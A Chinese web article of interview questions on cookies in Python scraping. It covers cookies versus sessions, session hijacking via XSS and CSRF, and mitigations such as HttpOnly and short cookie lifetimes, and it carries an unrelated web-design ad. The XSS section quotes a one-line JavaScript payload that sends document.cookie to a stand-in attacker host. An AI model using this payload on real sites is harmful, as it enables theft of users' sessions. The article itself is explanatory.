python爬蟲Cookie的面試題示例

小編給大家分享一下python爬蟲Cookie的面試題示例，希望大家閱讀完這篇文章后大所收獲，下面讓我們一起去探討吧！

洪雅網(wǎng)站建設(shè)公司成都創(chuàng)新互聯(lián)公司,洪雅網(wǎng)站設(shè)計制作，有大型網(wǎng)站制作公司豐富經(jīng)驗。已為洪雅近1000家提供企業(yè)網(wǎng)站建設(shè)服務(wù)。企業(yè)網(wǎng)站搭建\成都外貿(mào)網(wǎng)站建設(shè)公司要多少錢，請找那個售后服務(wù)好的洪雅做網(wǎng)站的公司定做！

1.Cookie和Session關(guān)系

都是為了實現(xiàn)客戶端與服務(wù)端交互而產(chǎn)出

Cookie是保存在客戶端，缺點易偽造、不安全

Session是保存在服務(wù)端，會消耗服務(wù)器資源

Session實現(xiàn)有兩種方式：Cookie和URL重寫

2.Cookie帶來的安全性問題

會話劫持和XSS：在Web應(yīng)用中，Cookie常用來標(biāo)記用戶或授權(quán)會話。因此，如果Web應(yīng)用的Cookie被竊取，可能導(dǎo)致授權(quán)用戶的會話受到攻擊。常用的竊取Cookie的方法有利用社會工程學(xué)攻擊和利用應(yīng)用程序漏洞進行XSS攻擊。(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;HttpOnly類型的Cookie由于阻止了JavaScript對其的訪問性而能在一定程度上緩解此類攻擊。

跨站請求偽造（CSRF）：維基百科已經(jīng)給了一個比較好的CSRF例子。比如在不安全聊天室或論壇上的一張圖片，它實際上是一個給你銀行服務(wù)器發(fā)送提現(xiàn)的請求：當(dāng)你打開含有了這張圖片的HTML頁面時，如果你之前已經(jīng)登錄了你的銀行帳號并且Cookie仍然有效（還沒有其它驗證步驟），你銀行里的錢很可能會被自動轉(zhuǎn)走。

解決CSRF的辦法有：隱藏域驗證碼、確認(rèn)機制、較短的Cookie生命周期等

看完了這篇文章，相信你對python爬蟲Cookie的面試題示例有了一定的了解，想了解更多相關(guān)知識，歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝各位的閱讀！

文章題目：python爬蟲Cookie的面試題示例
文章地址：http://m.jiaotiyi.com/article/gieeis.html